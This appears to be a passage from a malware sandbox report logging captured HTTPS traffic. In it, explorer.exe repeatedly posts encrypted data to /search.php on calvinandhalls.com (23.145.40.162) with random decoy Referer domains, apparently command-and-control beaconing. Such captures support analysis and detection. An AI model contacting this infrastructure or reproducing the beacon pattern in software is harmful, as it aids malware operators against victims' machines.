2024-10-03 10:28:16 UTC	8000	IN	Data Raw: f5 b3 07 5d 5f c1 67 73 b0 c5 27 a7 47 0e 5f 7f b9 a0 bc 5a 8c ca b9 cd e9 d5 b5 b3 95 50 4a cf 1a 77 08 79 db 4e a8 75 5b d2 22 04 5c 9a cf 67 a4 a6 0a 56 68 ed 20 76 e9 63 5c be cc f2 47 e6 32 2c e3 65 3a 85 50 20 43 1e e0 1f 62 67 b4 2d f8 c4 c5 8d ff 34 a6 63 b9 5d f6 7e fd eb ce 28 e4 f3 08 67 65 f3 1d 31 2b d0 18 3b 33 67 7b 1f 73 1c 60 fd b5 6a 67 9c 34 a3 1b f4 56 fd 96 b2 8a 85 15 94 3e 68 1d 5b 9f fc 5f e3 b2 eb 82 51 e3 7c aa 5f 3a eb ab a3 97 b4 a4 03 b0 8b 03 2f 80 93 c9 ce a8 df d5 e8 80 32 8e b5 b1 58 29 dd 82 b7 76 9e 83 17 52 f4 90 b0 22 b4 b2 97 95 1a c5 b4 fd cf 93 23 74 9c 2b c3 1b 41 a1 39 9c e9 a7 eb 35 e7 8b 9f c7 34 20 07 99 af a2 0a a4 4c 88 be d2 8b 37 d7 80 11 23 dd 62 29 11 5f e6 34 9a 38 48 41 a5 f3 35 a9 f8 37 58 fb d7 cd 4b Data Ascii: ]_gs'G_ZPJwyNu["\gVh vc\G2,e:P Cbg-4c]~(ge1+;3g{s`jg4V>h[_Q\|_:/2X)vR"#t+A954 L7#b)_48HA57XK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49766	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:42 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://xijgwgdevjmtswh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 249 Host: calvinandhalls.com
2024-10-03 10:28:42 UTC	249	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 4b df 19 f1 d2 a2 17 4f e3 11 70 e7 60 82 d4 38 74 a7 72 2b 49 8b bb f5 33 d4 f4 64 01 d1 a5 32 fc 27 38 ac d2 4b 35 2d 65 3a 0d f8 75 da ea 82 21 d3 e4 43 7f 27 e8 61 51 bd 7c 69 85 d0 ff dd 40 75 ae 7b b3 6b ae 1b 5e bd 43 de 66 20 29 0a 7e c8 cb 40 b6 87 0d fe 5e 0d 99 a6 c0 1c e9 8c 0a fa aa 92 cb 27 63 d5 bb c9 62 30 ab 42 06 d8 3d 67 59 b8 44 7a 76 ec 46 3c 57 e6 d0 de 72 4d 83 d5 2e bd 39 9a b4 cd 30 26 1c 39 fb 4d 2c 5d 56 29 ee 15 f0 c5 6c 32 7e 3b 41 85 97 7a 51 15 08 ad df 8e 2b 80 c9 3e e1 3b e6 Data Ascii: rzmM-a\|6A\| )6IP g3iqH[CLj4%<KOp`8tr+I3d2'8K5-e:u!C'aQ\|i@u{k^Cf )~@^'cb0B=gYDzvF<WrM.90&9M,]V)l2~;AzQ+>;
2024-10-03 10:28:42 UTC	294	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 10:28:42 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Type: text/html; charset=utf-8 Connection: close Transfer-Encoding: chunked
2024-10-03 10:28:42 UTC	7898	IN	Data Raw: 31 65 65 37 0d 0a 19 00 00 00 1e 0d ae 58 88 5b ab 97 21 0d dd 60 2e 7b 1d 32 50 01 72 3e c8 9a 69 4c 1d 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa Data Ascii: 1ee7X[!`.{2Pr>iLn"DwQmZZKQ@@V44"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
2024-10-03 10:28:42 UTC	19	IN	Data Raw: 4a ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c c7 Data Ascii: JMQF 82
2024-10-03 10:28:42 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-10-03 10:28:42 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f 19 Data Ascii: 2000CCvH(= \| _ztb8PjV7+ytfq:2VHEt4T>=&2)_UmzKut\|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
2024-10-03 10:28:42 UTC	6	IN	Data Raw: 20 09 6c 1a f8 c5 Data Ascii: l
2024-10-03 10:28:42 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-10-03 10:28:42 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5 ab Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
2024-10-03 10:28:42 UTC	6	IN	Data Raw: 4f 16 27 c7 be ec Data Ascii: O'
2024-10-03 10:28:42 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49767	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:43 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://fdgupvtosasiwa.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 120 Host: calvinandhalls.com
2024-10-03 10:28:43 UTC	120	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 27 b7 24 95 b8 c7 33 1e ac 04 3f ef 27 eb 81 63 31 fd 31 2a 5a 9e bc 96 52 a7 aa 5a 64 f8 f1 24 bf 66 33 e5 8f 09 1b 4e 6e 66 Data Ascii: rzmM-a\|6A\| )6IP g3iqH[@Lj4%<'$3?'c11*ZRZd$f3Nnf
2024-10-03 10:28:44 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:43 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49768	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:44 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://kodkpkalobxsri.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 351 Host: calvinandhalls.com
2024-10-03 10:28:44 UTC	351	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6b 34 01 83 b7 25 93 3c 37 bb 71 fe 94 be 25 05 b7 67 6b 82 2e e3 ed 05 08 dc 6f 5c 3f c5 b4 cc 48 de bc 55 0f 87 b1 58 af 44 28 8f ff 74 3d 74 0e 26 57 d3 19 bf f9 a2 16 ef e2 2b 33 41 93 6a 5e b4 6a 1a f2 fd b8 bd 15 73 de 16 a3 29 91 10 7b 8c 2d 9f 48 3b 42 7c 6e aa b5 71 98 dc 12 cb 32 29 f4 bb cc 3b d0 bc 4c fa 8f 87 b4 26 65 b7 ae a1 16 43 a2 0c 4d ca 02 58 26 fb 43 20 58 ce 29 63 5e 97 ae d7 61 74 80 b6 18 8a 64 82 d2 a7 04 67 73 5d d9 5f 12 74 52 71 c2 41 b6 9c 2c 57 2b 2a 04 8b a6 75 2b 15 32 c5 ea 93 20 d0 a7 3a d2 66 de be bb da 4b 89 7f Data Ascii: rzmM-a\|6A\| )6IP g3iqH[@Lk4%<7q%gk.o\?HUXD(t=t&W+3Aj^js){-H;B\|nq2);L&eCMX&C X)c^atdgs]_tRqA,W+*u+2 :fK
2024-10-03 10:28:44 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:44 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49769	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:45 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://jurmqqmqntcvqoy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 156 Host: calvinandhalls.com
2024-10-03 10:28:45 UTC	156	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 68 34 01 83 b7 25 93 3c 3e f4 76 f8 c6 dd 26 47 f2 29 6c fd 74 d5 cb 0d 30 dd 05 44 41 88 ed cf 64 b4 c8 08 46 9d f5 25 ee 31 32 a6 98 18 1f 25 6a 57 43 d9 3d a3 f9 b3 47 da b2 2b 66 1c 90 51 57 a6 3d 03 c5 f0 9b b1 14 25 b2 44 c1 78 ab 03 37 94 06 db 4e 0d Data Ascii: rzmM-a\|6A\| )6IP g3iqH[@Lh4%<>v&G)lt0DAdF%12%jWC=G+fQW=%Dx7N
2024-10-03 10:28:46 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:45 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49770	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:46 UTC	287	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://hftfsugmiikbs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 339 Host: calvinandhalls.com
2024-10-03 10:28:46 UTC	339	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 69 34 01 83 b7 25 93 3c 60 ac 01 89 c7 ff 5f 15 aa 36 0f a6 21 e2 93 6e 3d a3 66 12 72 97 c1 89 4c d2 d3 62 50 de f5 5e 89 68 57 ae c4 79 6b 70 69 21 20 d0 35 dc 9e d1 2d d9 be 37 76 45 98 7e 11 e3 70 7f 8d fe 84 df 14 11 97 74 c5 7a b8 65 44 81 46 a3 78 74 33 1d 41 eb d7 0d 9d a8 7a 9b 4b 70 db a1 ad 03 a4 b3 7a 8a 8a e8 d8 16 2b d1 a3 bf 43 4a 89 11 44 8b 3e 7a 55 88 4c 25 78 c4 16 18 31 c7 b4 d7 08 22 ab b3 6b a1 3a 83 be cf 09 35 19 76 d8 68 21 61 24 73 ee 4b b6 8a 7b 40 2c 45 57 c7 81 3b 3b 0c 42 c6 9c 97 34 f2 ab 72 97 6c bf 96 ef be 00 d9 5b Data Ascii: rzmM-a\|6A\| )6IP g3iqH[@Li4%<`_6!n=frLbP^hWykpi! 5-7vE~ptzeDFxt3AzKpz+CJD>zUL%x1"k:5vh!a$sK{@,EW;;B4rl[
2024-10-03 10:28:47 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:46 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49771	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:47 UTC	290	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://wyhdnnvnqsrlhywg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 273 Host: calvinandhalls.com
2024-10-03 10:28:47 UTC	273	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6e 34 01 83 b7 25 93 3c 26 c6 13 9c 94 d3 59 21 bc 00 27 fc 4b f5 e2 7f 0e c2 29 29 75 a8 ca fc 51 e8 b1 09 68 eb 97 24 b0 5a 54 a4 d6 53 61 4d 00 22 4f ef 75 bb cb b6 28 8e f0 32 64 1d f1 0b 38 c1 6e 1c f4 cb 85 c3 27 2a da 04 e0 23 bf 72 30 cf 39 bc 25 62 4e 1a 59 fc ea 5a f9 97 6e e5 59 0b c7 a3 b4 5f b0 a1 65 bc d9 ed d3 0b 48 a5 a0 af 06 20 95 43 4c 9c 60 49 2a 82 28 7e 3b d5 00 0f 57 d9 ce f1 1d 26 df e2 2f 8f 38 f2 e3 d2 70 30 6f 76 d6 01 14 6e 5a 05 ac 01 b1 ad 65 33 70 50 53 f3 fc 51 28 2d 21 dc e5 c4 2f f8 ac 04 80 6c 9c a7 e2 94 6d d6 46 Data Ascii: rzmM-a\|6A\| )6IP g3iqH[@Ln4%<&Y!'K))uQh$ZTSaM"Ou(2d8n'#r09%bNYZnY_eH CL`I(~;W&/8p0ovnZe3pPSQ(-!/lmF
2024-10-03 10:28:48 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:47 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49772	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:48 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://lapmbexmlxcjol.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 164 Host: calvinandhalls.com
2024-10-03 10:28:48 UTC	164	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6f 34 01 83 b7 25 93 3c 62 b8 7b a2 c0 da 59 31 ea 70 6d ba 65 ee 8d 38 02 df 05 20 3c 9e b9 dd 77 ab d9 5e 7b cf a1 3d fd 49 61 a5 e3 5f 6a 64 47 1e 53 fd 2e c1 d3 df 0f e5 8a 7f 7b 3b 86 65 06 ad 66 41 dc 9f ea 86 13 33 b7 79 d1 76 9f 6a 61 8f 22 dc 62 3e 31 35 45 d0 c8 63 b0 ff Data Ascii: rzmM-a\|6A\| )6IP g3iqH[@Lo4%<b{Y1pme8 <w^{=Ia_jdGS.{;efA3yvja"b>15Ec
2024-10-03 10:28:48 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:48 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49773	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:49 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://vblsrajdotdorwh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 162 Host: calvinandhalls.com
2024-10-03 10:28:49 UTC	162	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6c 34 01 83 b7 25 93 3c 31 aa 35 be 92 c7 09 54 a1 22 1f 82 5e fe 92 00 6e b4 6f 57 56 9b f8 db 66 a5 c8 45 55 dc 97 2e be 6e 2f e7 e8 16 20 76 79 3e 06 ce 13 8b 8e a2 0e ce a6 51 0a 48 f9 7f 59 ee 4e 5e e2 84 92 99 0f 1e 86 45 a1 6e fb 02 79 ca 5d da 60 35 2d 14 6b c2 e9 28 Data Ascii: rzmM-a\|6A\| )6IP g3iqH[@Ll4%<15T"^noWVfEU.n/ vy>QHYN^Eny]`5-k(
2024-10-03 10:28:50 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:49 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49774	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:51 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://ofhxxqwynqyymdr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 320 Host: calvinandhalls.com
2024-10-03 10:28:51 UTC	320	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6d 34 01 83 b7 25 93 3c 2d f2 09 fe 96 a0 53 2a b7 2c 7a ba 44 c6 ea 13 3b d1 34 3f 74 a1 c1 8c 70 df ab 60 7b fb e1 35 8b 20 4c a3 db 09 02 23 01 57 5f 91 79 8e cc 94 27 84 f1 2d 65 08 fb 79 47 cf 7a 00 80 ff ae 95 28 77 8f 61 b5 7a 90 3d 35 d0 52 cf 39 7c 2b 2f 08 fb b8 6f 81 dd 0f c2 35 08 f8 c0 93 1e be 8d 41 94 8d 85 d1 19 2b c0 b4 84 0f 07 b1 7c 58 f0 2b 76 4a fb 5a 2d 40 cd 28 11 0c f2 a4 9e 2b 3f d8 f4 7e 8b 62 89 e9 fe 26 34 18 3b c7 10 01 06 1c 7a c2 40 bb a2 06 34 03 5c 2b 81 84 33 64 08 52 ca ce 90 2e 8c d8 3d d1 46 b1 a2 af de 13 c5 59 Data Ascii: rzmM-a\|6A\| )6IP g3iqH[@Lm4%<-S*,zD;4?tp`{5 L#W_y'-eyGz(waz=5R9\|+/o5A+\|X+vJZ-@(+?~b&4;z@4\+3dR.=FY
2024-10-03 10:28:51 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:51 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49775	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:52 UTC	287	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://sahqobiyulqik.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 328 Host: calvinandhalls.com
2024-10-03 10:28:52 UTC	328	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 62 34 01 83 b7 25 93 3c 37 c6 17 98 a5 ca 4a 16 d9 7e 00 b0 36 97 ed 77 7e c4 02 59 5f 99 be 8e 3d e6 e8 01 67 8d a5 40 9f 70 5a 8e f0 09 3a 3a 02 33 2b f5 64 d9 f0 c3 22 93 eb 7d 6d 39 8e 61 48 d0 41 6d e1 82 83 b9 02 25 cb 5d bc 3a b1 10 36 97 10 89 77 4f 28 2d 76 f5 b3 7f e1 de 7d db 5d 04 e8 df d4 3a b3 99 4e 84 9f 83 b4 34 53 af 97 a2 07 0b 8a 41 41 9c 68 74 23 b3 68 00 69 f3 1c 71 59 d0 d1 99 39 49 c6 d3 67 93 70 c3 e3 e5 08 01 22 56 f7 56 2c 7d 26 26 e1 5a a4 d5 10 2f 35 39 42 9c f9 2a 3a 3b 37 96 cf d2 3d d8 ee 3b de 73 95 8d a8 cd 09 b6 5d Data Ascii: rzmM-a\|6A\| )6IP g3iqH[@Lb4%<7J~6w~Y_=g@pZ::3+d"}m9aHAm%]:6wO(-v}]:N4SAAht#hiqY9Igp"VV,}&&Z/59B*:;7=;s]
2024-10-03 10:28:52 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 10:28:52 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49776	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 10:28:53 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://ccbxpmvivyv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 356 Host: calvinandhalls.com
2024-10-03 10:28:53 UTC	356	OUT	Data Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 63 34 01 83 b7 25 93 3c 6b f4 18 9a 86 e4 3b 3a de 10 75 a2 2c cb d1 2f 32 d0 78 0e 30 ae b4 d6 6f e4 d0 57 5e f0 b7 7f f0 63 63 fb 83 72 75 62 01 5d 44 da 7d b3 e7 db 53 d3 ad 48 16 26 85 0f 34 d7 2c 40 dd 89 e0 b6 50 64 bc 5b bb 57 82 0f 64 cb 2e be 55 4e 6d 6f 52 ec bd 05 ac 94 3d f0 16 08 ce c1 c9 53 a1 ac 5c ff d2 96 ba 47 27 91 c9 de 0b 20 da 17 16 95 17 43 13 b3 2e 24 2d aa 39 08 2a 8a 96 9a 72 32 c4 d2 6e 90 20 95 f1 d9 30 3f 2b 79 be 5c 66 06 3e 34 a9 18 96 9d 7b 5b 24 2d 5a c2 f7 27 31 43 58 d6 f0 d3 5c f4 cc 71 eb 23 df b1 d5 c3 65 91 7c Data Ascii: rzmM-a\|6A\| )6IP 